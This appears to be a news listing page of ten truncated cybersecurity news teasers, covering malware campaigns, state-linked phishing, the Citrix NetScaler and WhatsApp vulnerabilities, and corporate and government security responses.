An insidious malware attack known as “Sindoor Dropper” targets Linux operating systems, leveraging sophisticated spear-phishing methods and a complex, multi-stage infection process. The insidious operation targets users with lures related to the recent Pakistan-India conflict, known as Operation Sindoor, to trick them into activating malicious files. The Sindoor Dropper campaign highlights an evolution in threat actors’ attack techniques, demonstrating a clear focus on Linux environments, which are less targeted by phishing campaigns. The attack begins when a user opens a malicious .desktopfile, named “Note_Warfare_Ops_Sindoor.pdf.desktop”, which masquerades as a regular PDF document. According to the analysis of the Nextron system, once executed, it

Mediation efforts led by Arab nations to secure the release of Israelis held by Hamas and a ceasefire in Gaza have been interrupted by cyber attacks from Iran, a cybersecurity firm said. As reported yesterday in the article highlighting the attacks discovered by the firm According to Israeli Dream, Iranian cybercriminals infiltrated diplomatic networks in the Middle East during ceasefire negotiations in Cairo and compromised sensitive international communications. The spear-phishing campaign, disguised as a communication from the Omani Ministry of Foreign Affairs, was carried out by the Homeland Justice group associated with Iran’s Ministry of Intelligence and Security, it said. The email

A critical zero-day flaw, classified as CVE-2025-6543, has been discovered in Citrix NetScaler systems. This vulnerability has been actively exploited by malicious hackers since May 2025, several months before a fix was made available. Citrix initially reported a simple memory overflow vulnerability that could cause abnormal control flow and denial of service, but it later emerged that the security breach actually allows remote code execution (RCE) without authentication, potentially resulting in a widespread global system compromise. The bug, tracked as CVE-2025-6543, allows an attacker to overwrite system memory by providing a malicious client certificate to the /cgi/api/login endpoint on a vulnerable NetScaler

The Pentagon has sent a “letter of concern” to Microsoft documenting a “breach of trust” regarding the company’s use of Chinese engineers to maintain sensitive government computer systems, Defense Secretary Pete Hegseth announced this week. At the same time, the Department of Defense is launching an investigation into whether any of these employees compromised national security. “The use of Chinese nationals to maintain Department of Defense cloud environments is over,” Hegseth said in a video statement. “We have sent a formal letter of concern to Microsoft documenting this breach of trust and are requesting a third-party audit of Microsoft’s digital stash program,

A complex watering hole campaign, orchestrated by the notorious hacker group APT29, linked to Russian foreign intelligence services, was neutralized by Amazon’s cybersecurity team. This latest campaign marks a significant tactical shift from previous operations, demonstrating the group’s ability to evolve under pressure from cybersecurity defenders. Unlike the October 2024 campaign, which relied on impersonating the AWS domain to distribute malicious Remote Desktop Protocol files, APT29’s new approach involved compromising legitimate websites and injecting obfuscated JavaScript code. APT29 created convincing fake Cloudflare verification pages on domains such as findcloudflare[.]com, designed to trick users into authorizing attacker-controlled devices via Microsoft’s authentication workflow. The

Google is poised to adopt a more proactive stance to protect itself and potentially other U.S. organizations from cyberattacks, with the company suggesting it may assume the role of attacker in the digital realm. Google plans to form a “proactive countermeasures team” to combat cybercriminals in the coming months, said Sandra Joyce, vice president of the Google Threat Intelligence Group. “At the Google Threat Intelligence Group, we are proactively identifying opportunities to disrupt campaigns or operations. We will need to shift from a reactive to a proactive posture if we want to make a difference right now.” This was stated during an

A security flaw in WhatsApp’s messaging apps for Apple iOS and macOS has been patched, the company reported, after likely being widely exploited alongside a recently discovered Apple vulnerability in targeted zero-day attacks. A case of insufficient authorization for syncing messages between connected devices is behind the vulnerability, identified as CVE-2025-55177, with a CVSS score of 8.0, which has been exploited by surveillance software (spyware). The discovery and subsequent reassessment of the bug are attributed to researchers on WhatsApp’s security team. Donncha Ó Cearbhaill, head of Amnesty International’s Security Lab, said WhatsApp has alerted an unknown number of individuals it believes were

A far-reaching security advisory has been issued by Google to the 2.5 billion users of its Gmail service, aiming to strengthen the protection of their accounts following a data breach affecting one of the company’s third-party Salesforce-based systems. In June 2025, an incident occurred that heightened concerns about complex phishing operations targeting a broad audience of users. This is one of the largest mass security alerts sent by Google, partly because, despite many users using complex passwords, only about a third update them regularly, leaving countless accounts exposed, especially those that don’t use MFA. In June, a cybercriminal group identified as UNC6040,

Participants in the cyberattack on the Moscow Electronic School were offered towork to improve cybersecurity and other digital services of the capital’s administration. This all comes after September 17, 2022, when students and teachers were unable to upload assignments, assign grades, or use services for three days due to a hacker attack. Talent recruitment Moscow authorities hired criminal hackers after their cyberattack on the Moscow Electronic School (MES) computer platform. writes RBC. According to Moscow Deputy Mayor Anastasia Rakova, the participants in the MES cyberattack have received an offer to work on improving cyber defense and other digital services of the capital’s

A complex malware campaign has been discovered, targeting users searching for free PDF editing software. A malicious application, disguised as a legitimate “AppSuite PDF Editor”, is being spread by cybercriminals. The threat actors behind this campaign have demonstrated unprecedented boldness by submitting their malware to antivirus companies as false positives, in an attempt to have the security detections removed. The installer, built using the open source WiX toolset, immediately downloads the actual PDF editor program from vault.appsuites.ai after execution and acceptance of the End User License Agreement. The malware, packaged as a Microsoft Installer (MSI) file, is distributed via high-profile websites designed